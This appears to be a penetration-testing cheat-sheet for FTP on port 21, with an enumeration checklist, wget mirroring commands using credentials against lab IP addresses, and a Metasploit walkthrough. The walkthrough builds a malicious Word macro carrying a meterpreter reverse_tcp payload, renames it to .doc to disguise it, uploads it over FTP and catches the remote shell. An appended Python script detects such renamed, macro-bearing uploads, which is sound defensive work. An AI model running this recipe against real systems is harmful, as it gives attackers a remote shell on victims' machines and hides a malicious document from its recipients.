FTP 21
Enumeration one liners
#Checklist
$ Anonymous login
$ OS version
$ Other software you can find on the machine (Prog Files, yum.log, /bin)
$ password files
$ DLLs for msfpescan / BOF targets
$ Do you have UPLOAD potential?
$ Can you trigger execution of uploads?
$ Swap binaries?
$ Public exploits for ftp server software
#download all dirs and files
wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'
#if PASV transfer is disabled
wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
#If PASV is enabled
sudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'
#Grab FTP Banner via telnet
telnet -n 192.168.101.100 21
#Grab FTP Certificate if existing
#nmap ftp
#Connect with Browser
#Hydra Brute Force (Need Username)
#Msfconsole one liner
#Possibly upload kali generated ssh-keys and deploy into target, then ssh directly into user
#MS Office evil macro reverse shell (Uploaded on ftp)
First stage:
1)msfconsole --> search office macro
2)use /multi/fileformat/office_word_macro --> show options
3)set meterpreter reverse listener
set payload windows/meterpreter/reverse_tcp
4)set listening host (kali) and disable payload handler
set lhost 192.168.119.177 #lport automatically set as 4444
set disablepayloadhandler false
run
Second stage:
File stored at : /home/kali/.msf4/local/msf.docm
1)Change extension from .docm to .doc
sudo mv msf.docm msf.doc
2)Start meterpreter listener
set payload windows/meterpreter/reverse_tcp
set exitonsession false
set lhost 192.168.119.177
set lport 4444
run -j
3)use put command to upload
ftp 10.10.10.10 21
put msf.doc
exit
4)Catch meterpreter session
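Seen from the receiving side, the rename step above (.docm to .doc) leaves a file whose extension no longer matches its container format. The following is an added example, not part of the original notes: a Python check a defender could run over files landing in an FTP upload directory. The function names `inspect_upload` and `make_zip` are hypothetical, and the sample files are constructed in memory.

```python
import io
import zipfile

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .doc/.xls/.ppt container
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx/.docm) container
LEGACY_EXT = {"doc", "xls", "ppt"}


def inspect_upload(name, data):
    """Return a list of findings for one uploaded file (name + raw bytes)."""
    findings = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = [m.lower() for m in zf.namelist()]
        except zipfile.BadZipFile:
            return ["unreadable-zip"]
        # Macro-enabled OOXML documents carry their VBA project in vbaProject.bin.
        if any(m.endswith("vbaproject.bin") for m in members):
            findings.append("vba-macros")
        # A ZIP container behind a legacy extension means the file was renamed.
        if ext in LEGACY_EXT:
            findings.append("ooxml-with-legacy-extension")
    elif data.startswith(OLE2_MAGIC) and ext in {"docx", "docm"}:
        findings.append("ole2-with-ooxml-extension")
    return findings


def make_zip(members):
    """Build a constructed in-memory ZIP holding the given member names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member in members:
            zf.writestr(member, b"constructed sample")
    return buf.getvalue()


# Constructed samples: (file name as uploaded, file bytes).
SAMPLES = [
    ("msf.doc", make_zip(["[Content_Types].xml", "word/document.xml", "word/vbaProject.bin"])),
    ("notes.docx", make_zip(["[Content_Types].xml", "word/document.xml"])),
    ("old.doc", OLE2_MAGIC + b"\x00" * 504),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, inspect_upload(name, data) or "ok")
```

Checking the container's magic bytes and member list rather than the file name is what makes the check survive a simple rename.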